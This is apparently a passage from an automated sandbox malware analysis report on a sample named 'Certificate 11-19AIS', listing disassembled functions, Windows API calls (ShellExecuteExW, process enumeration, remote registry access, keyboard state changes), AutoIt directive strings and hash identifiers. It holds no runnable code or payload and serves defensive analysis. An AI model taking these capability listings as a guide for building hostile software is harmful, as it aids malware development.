                                                                              • Opcode Fuzzy Hash: 5fb6f01de9a3bdb2754c22fcb940c220ed9e0636de1d98f16838c5379e98f4dd
                                                                              • Instruction Fuzzy Hash: 54A1AE3560062AEFDB18CF68D9897ADBBB1FF44704F148115E854EB296D734ADA0CF90
                                                                              Function 007CAE78 Relevance: 10.7, APIs: 7, Instructions: 218COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 196ec45403647516f2b4a09f68df960a1cab7b551d235e3c2910f57837e42af3
                                                                              • Instruction ID: fc875cdf5ac7d33401160f572118806f6f9a9e486261ccdd71a395ad18939fcf
                                                                              • Opcode Fuzzy Hash: 196ec45403647516f2b4a09f68df960a1cab7b551d235e3c2910f57837e42af3
                                                                              • Instruction Fuzzy Hash: 7E7169B0900509FFCB04CF98CC89EAEBB78FF85315F24815DF915AA251C734AA51CBA5
                                                                              Function 00812230 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 191COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • _memset.LIBCMT ref: 0081225A
                                                                              • _memset.LIBCMT ref: 00812323
                                                                              • ShellExecuteExW.SHELL32(?), ref: 00812368
                                                                                • Part of subcall function 007B936C: __swprintf.LIBCMT ref: 007B93AB
                                                                                • Part of subcall function 007B936C: __itow.LIBCMT ref: 007B93DF
                                                                                • Part of subcall function 007CC6F4: _wcscpy.LIBCMT ref: 007CC717
                                                                              • CloseHandle.KERNEL32(00000000), ref: 0081242F
                                                                              • FreeLibrary.KERNEL32(00000000), ref: 0081243E
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
                                                                              Similarity
                                                                              • API ID: _memset$CloseExecuteFreeHandleLibraryShell__itow__swprintf_wcscpy
                                                                              • String ID: @
                                                                              • API String ID: 4082843840-2766056989
                                                                              • Opcode ID: 4df93a5cbe462531cb2ab8de638fce24d0eebd9f883883d99ecc5159a252c0d4
                                                                              • Instruction ID: efaae6d6edfb72ce20a8557b36c931f3b77dcce474010291a443eadba39afa8c
                                                                              • Opcode Fuzzy Hash: 4df93a5cbe462531cb2ab8de638fce24d0eebd9f883883d99ecc5159a252c0d4
                                                                              • Instruction Fuzzy Hash: 42715970A00619DFCB15EFA4C885AAEB7F9FF48310F108459E959AB361DB38AD50CB94
                                                                              Function 007F3DA8 Relevance: 10.7, APIs: 7, Instructions: 165windowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetParent.USER32(?), ref: 007F3DE7
                                                                              • GetKeyboardState.USER32(?), ref: 007F3DFC
                                                                              • SetKeyboardState.USER32(?), ref: 007F3E5D
                                                                              • PostMessageW.USER32(?,00000101,00000010,?), ref: 007F3E8B
                                                                              • PostMessageW.USER32(?,00000101,00000011,?), ref: 007F3EAA
                                                                              • PostMessageW.USER32(?,00000101,00000012,?), ref: 007F3EF0
                                                                              • PostMessageW.USER32(?,00000101,0000005B,?), ref: 007F3F13
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
                                                                              Similarity
                                                                              • API ID: MessagePost$KeyboardState$Parent
                                                                              • String ID:
                                                                              • API String ID: 87235514-0
                                                                              • Opcode ID: 66424dd1888c8675065a7c5bd35b7b93924693cc0e86142a27619d9ef1ec6c4d
                                                                              • Instruction ID: bc9e3adb61bec6d6a4b0cce00fba340cdc7bc38676a6b59e06a417b91f22ff1c
                                                                              • Opcode Fuzzy Hash: 66424dd1888c8675065a7c5bd35b7b93924693cc0e86142a27619d9ef1ec6c4d
                                                                              • Instruction Fuzzy Hash: 0F51B3A0A047D93DFB364734CC45BBA7EA96F46304F084589F2D5969C3D29CAEC8D760
                                                                              Function 007F3BC3 Relevance: 10.7, APIs: 7, Instructions: 164windowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetParent.USER32(00000000), ref: 007F3C02
                                                                              • GetKeyboardState.USER32(?), ref: 007F3C17
                                                                              • SetKeyboardState.USER32(?), ref: 007F3C78
                                                                              • PostMessageW.USER32(00000000,00000100,00000010,?), ref: 007F3CA4
                                                                              • PostMessageW.USER32(00000000,00000100,00000011,?), ref: 007F3CC1
                                                                              • PostMessageW.USER32(00000000,00000100,00000012,?), ref: 007F3D05
                                                                              • PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 007F3D26
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
                                                                              Similarity
                                                                              • API ID: MessagePost$KeyboardState$Parent
                                                                              • String ID:
                                                                              • API String ID: 87235514-0
                                                                              • Opcode ID: 477ee3f32d9d9128d3d872f48ebcab8456f6babced80a696fb0a0cff206b3e28
                                                                              • Instruction ID: 4b0c5edcc6c5346f12886cd9dd580247861336de6eecee3185a63c39a2efc445
                                                                              • Opcode Fuzzy Hash: 477ee3f32d9d9128d3d872f48ebcab8456f6babced80a696fb0a0cff206b3e28
                                                                              • Instruction Fuzzy Hash: F55109A06047DD3DFB368374CC55B76BFA96B46300F088489E2D55A6C3D29CEE84E760
                                                                              Function 007F7DB1 Relevance: 10.6, APIs: 7, Instructions: 137timeCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
                                                                              Similarity
                                                                              • API ID: _wcsncpy$LocalTime
                                                                              • String ID:
                                                                              • API String ID: 2945705084-0
                                                                              • Opcode ID: 7568fd6ef714ee1256c00937e49ae473687ee5ac10ae54e47f1d4d03cd4b0f3c
                                                                              • Instruction ID: 4cc45c12dd9af0023ed3c6a593107c46beb9edce773a19868d782b71acaa45c1
                                                                              • Opcode Fuzzy Hash: 7568fd6ef714ee1256c00937e49ae473687ee5ac10ae54e47f1d4d03cd4b0f3c
                                                                              • Instruction Fuzzy Hash: 6D414366D14218B6DB10EBF4884AADF77BCAF15310F544967E508E3222FA38D615C3B5
                                                                              Function 00818FC8 Relevance: 10.6, APIs: 7, Instructions: 99windowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 00818FE7
                                                                              • GetWindowLongW.USER32(00CFDBA8,000000F0), ref: 0081901A
                                                                              • GetWindowLongW.USER32(00CFDBA8,000000F0), ref: 0081904F
                                                                              • SendMessageW.USER32(00000000,000000F1,00000000,00000000), ref: 00819081
                                                                              • SendMessageW.USER32(00000000,000000F1,00000001,00000000), ref: 008190AB
                                                                              • GetWindowLongW.USER32(00000000,000000F0), ref: 008190BC
                                                                              • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 008190D6
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
                                                                              Similarity
                                                                              • API ID: LongWindow$MessageSend
                                                                              • String ID:
                                                                              • API String ID: 2178440468-0
                                                                              • Opcode ID: 4fd1500215774e2b3a6b004bddd0b7da530a4716fa59279f701c5e74f9dbf1d5
                                                                              • Instruction ID: 38c52d786d02fc23ea6270dc3cd9b35b289ee2af75e14797f1ef61742d01e14b
                                                                              • Opcode Fuzzy Hash: 4fd1500215774e2b3a6b004bddd0b7da530a4716fa59279f701c5e74f9dbf1d5
                                                                              • Instruction Fuzzy Hash: CF3123746006149FDB20CF58EC99FA437A9FBAA714F140168F559CB2B2CB71A880DB81
                                                                              Function 007F08AF Relevance: 10.6, APIs: 7, Instructions: 94memoryCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 007F08F2
                                                                              • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 007F0918
                                                                              • SysAllocString.OLEAUT32(00000000), ref: 007F091B
                                                                              • SysAllocString.OLEAUT32(?), ref: 007F0939
                                                                              • SysFreeString.OLEAUT32(?), ref: 007F0942
                                                                              • StringFromGUID2.OLE32(?,?,00000028), ref: 007F0967
                                                                              • SysAllocString.OLEAUT32(?), ref: 007F0975
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
                                                                              Similarity
                                                                              • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                                              • String ID:
                                                                              • API String ID: 3761583154-0
                                                                              • Opcode ID: 7bb34c681f11d80215bcef299ec80d0fb174e76fb836e10a7114368b49baade4
                                                                              • Instruction ID: f9434ae0bd46b152f34b6761cf3f330250601e5f245df9d6523d6457516a11f2
                                                                              • Opcode Fuzzy Hash: 7bb34c681f11d80215bcef299ec80d0fb174e76fb836e10a7114368b49baade4
                                                                              • Instruction Fuzzy Hash: 1421977660121DAF9B10DF78DC88DBB73ACFB09360B008525FA15DB352E6B4EC4587A4
                                                                              Function 007F2472 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 90COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
                                                                              Similarity
                                                                              • API ID: __wcsnicmp
                                                                              • String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
                                                                              • API String ID: 1038674560-2734436370
                                                                              • Opcode ID: 497142e72ecf4d623cf04c5d0c2199d7532eb1392444f8038e8ba001370f87ae
                                                                              • Instruction ID: f2a779c0ba6e531101d1d64239ff85c896cd824ab7e3e769c257fc34faf4aaa7
                                                                              • Opcode Fuzzy Hash: 497142e72ecf4d623cf04c5d0c2199d7532eb1392444f8038e8ba001370f87ae
                                                                              • Instruction Fuzzy Hash: 3F217C31204659B7D321A6349C16FBB73A8EF64310F60402AF645D7383E69D9D53C3A5
                                                                              Function 007F0986 Relevance: 10.6, APIs: 7, Instructions: 89memoryCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 007F09CB
                                                                              • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 007F09F1
                                                                              • SysAllocString.OLEAUT32(00000000), ref: 007F09F4
                                                                              • SysAllocString.OLEAUT32 ref: 007F0A15
                                                                              • SysFreeString.OLEAUT32 ref: 007F0A1E
                                                                              • StringFromGUID2.OLE32(?,?,00000028), ref: 007F0A38
                                                                              • SysAllocString.OLEAUT32(?), ref: 007F0A46
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
                                                                              Similarity
                                                                              • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                                              • String ID:
                                                                              • API String ID: 3761583154-0
                                                                              • Opcode ID: 424ebd61312550e42895f3b6102b4c05e0bb0824be267df0df3ea9d6067fa27b
                                                                              • Instruction ID: e4dec2aa177d7b02fc04ba91da2f88ec7590295a79658bb57334d9c282378565
                                                                              • Opcode Fuzzy Hash: 424ebd61312550e42895f3b6102b4c05e0bb0824be267df0df3ea9d6067fa27b
                                                                              • Instruction Fuzzy Hash: AA213275604208AF9B10DBB8DC89DBAB7EDFF49360740C525FA49CB361E674EC418764
                                                                              Function 0081A2C8 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 75windowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                                • Part of subcall function 007CD17C: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 007CD1BA
                                                                                • Part of subcall function 007CD17C: GetStockObject.GDI32(00000011), ref: 007CD1CE
                                                                                • Part of subcall function 007CD17C: SendMessageW.USER32(00000000,00000030,00000000), ref: 007CD1D8
                                                                              • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 0081A32D
                                                                              • SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 0081A33A
                                                                              • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 0081A345
                                                                              • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 0081A354
                                                                              • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 0081A360
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
                                                                              Similarity
                                                                              • API ID: MessageSend$CreateObjectStockWindow
                                                                              • String ID: Msctls_Progress32
                                                                              • API String ID: 1025951953-3636473452
                                                                              • Opcode ID: aacc051cfd9bf14a762d8e884640decbb29a7f49b594d8aa6aeb3137474e4679
                                                                              • Instruction ID: db2d8fda5c6e3b958bd01e54916d18ca57e83c5b282e092e644e66f305935a91
                                                                              • Opcode Fuzzy Hash: aacc051cfd9bf14a762d8e884640decbb29a7f49b594d8aa6aeb3137474e4679
                                                                              • Instruction Fuzzy Hash: 06118BB1150219BEEF159FA4CC86EEB7F6DFF08798F014114BA18A61A0C6729C61DBA4
                                                                              Function 007CCCCD Relevance: 9.3, APIs: 6, Instructions: 253COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetClientRect.USER32(?,?), ref: 007CCCF6
                                                                              • GetWindowRect.USER32(?,?), ref: 007CCD37
                                                                              • ScreenToClient.USER32(?,?), ref: 007CCD5F
                                                                              • GetClientRect.USER32(?,?), ref: 007CCE8C
                                                                              • GetWindowRect.USER32(?,?), ref: 007CCEA5
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
                                                                              Similarity
                                                                              • API ID: Rect$Client$Window$Screen
                                                                              • String ID:
                                                                              • API String ID: 1296646539-0
                                                                              • Opcode ID: ced7936d8f3f0053f04995076f76ec5b78f49e0e2738d48ba628b0b7005a1219
                                                                              • Instruction ID: 890cfa5fe8fc9783a79e8819f4d90aab66d12fb68c4cefe213c83491ceb1dd6d
                                                                              • Opcode Fuzzy Hash: ced7936d8f3f0053f04995076f76ec5b78f49e0e2738d48ba628b0b7005a1219
                                                                              • Instruction Fuzzy Hash: 69B12779A00649DBDB11CFA8C580BEEBBB1FF08310F14956DEC59EB250DB34A951CB68
                                                                              Function 00811BDF Relevance: 9.2, APIs: 6, Instructions: 163processCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • CreateToolhelp32Snapshot.KERNEL32 ref: 00811C18
                                                                              • Process32FirstW.KERNEL32(00000000,?), ref: 00811C26
                                                                              • __wsplitpath.LIBCMT ref: 00811C54
                                                                                • Part of subcall function 007D1DFC: __wsplitpath_helper.LIBCMT ref: 007D1E3C
                                                                              • _wcscat.LIBCMT ref: 00811C69
                                                                              • Process32NextW.KERNEL32(00000000,?), ref: 00811CDF
                                                                              • CloseHandle.KERNEL32(00000000,?,?,00000002,00000000), ref: 00811CF1
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
                                                                              Similarity
                                                                              • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32__wsplitpath__wsplitpath_helper_wcscat
                                                                              • String ID:
                                                                              • API String ID: 1380811348-0
                                                                              • Opcode ID: 43c6cc29c3cdc0e9d4fa62b121ad61f51c0e4411722025cc77552b2503cff29c
                                                                              • Instruction ID: 79b17684af25904c5f2ce81d8672ad15e5e90c224f3fca175df19cfe374353b6
                                                                              • Opcode Fuzzy Hash: 43c6cc29c3cdc0e9d4fa62b121ad61f51c0e4411722025cc77552b2503cff29c
                                                                              • Instruction Fuzzy Hash: A7514BB11043409BD720DF64D889FABB7ECFF88754F00492EF68AD7251EB7499448B92
                                                                              Function 00812FD6 Relevance: 9.2, APIs: 6, Instructions: 160registryCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                                • Part of subcall function 00813C06: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00812BB5,?,?), ref: 00813C1D
                                                                              • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 008130AF
                                                                              • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 008130EF
                                                                              • RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 00813112
                                                                              • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 0081313B
                                                                              • RegCloseKey.ADVAPI32(?,?,00000000), ref: 0081317E
                                                                              • RegCloseKey.ADVAPI32(00000000), ref: 0081318B
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
                                                                              Similarity
                                                                              • API ID: Close$BuffCharConnectEnumOpenRegistryUpperValue
                                                                              • String ID:
                                                                              • API String ID: 3451389628-0
                                                                              • Opcode ID: 97cf12abf5fc113552272dad4f18c225dde395c03b7ce32fb3f4cdc146d6199b
                                                                              • Instruction ID: 15f3cd6453f9587a5635bead736e650a54ea65ad78d0c7d6a3315f9c8a9de419
                                                                              • Opcode Fuzzy Hash: 97cf12abf5fc113552272dad4f18c225dde395c03b7ce32fb3f4cdc146d6199b
                                                                              • Instruction Fuzzy Hash: 19514531208304EFC705EF64C899EAABBE9FF88304F04895DF595872A1DB35EA45CB52
                                                                              Function 008184DE Relevance: 9.2, APIs: 6, Instructions: 152windowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetMenu.USER32(?), ref: 00818540
                                                                              • GetMenuItemCount.USER32(00000000), ref: 00818577
                                                                              • GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 0081859F
                                                                              • GetMenuItemID.USER32(?,?), ref: 0081860E
                                                                              • GetSubMenu.USER32(?,?), ref: 0081861C
                                                                              • PostMessageW.USER32(?,00000111,?,00000000), ref: 0081866D
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
                                                                              Similarity
                                                                              • API ID: Menu$Item$CountMessagePostString
                                                                              • String ID:
                                                                              • API String ID: 650687236-0
                                                                              • Opcode ID: 4f5d234aa311c79cd4911d19a9c279cd0ee92f8770e02c767a8a9c6b71617b24
                                                                              • Instruction ID: 32b286db01eaf0a8cd518b8591ec3800f8efbea70ec56ed585eb1ce80ce1d481
                                                                              • Opcode Fuzzy Hash: 4f5d234aa311c79cd4911d19a9c279cd0ee92f8770e02c767a8a9c6b71617b24
                                                                              • Instruction Fuzzy Hash: 48517831A00218EFCB11EF64C84AAEEB7F9FF58310F104499E915EB351DB34AE818B90
                                                                              Function 007F4AC2 Relevance: 9.1, APIs: 6, Instructions: 136windowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • _memset.LIBCMT ref: 007F4B10
                                                                              • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 007F4B5B
                                                                              • IsMenu.USER32(00000000), ref: 007F4B7B
                                                                              • CreatePopupMenu.USER32 ref: 007F4BAF
                                                                              • GetMenuItemCount.USER32(000000FF), ref: 007F4C0D
                                                                              • InsertMenuItemW.USER32(00000000,?,00000001,00000030), ref: 007F4C3E
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
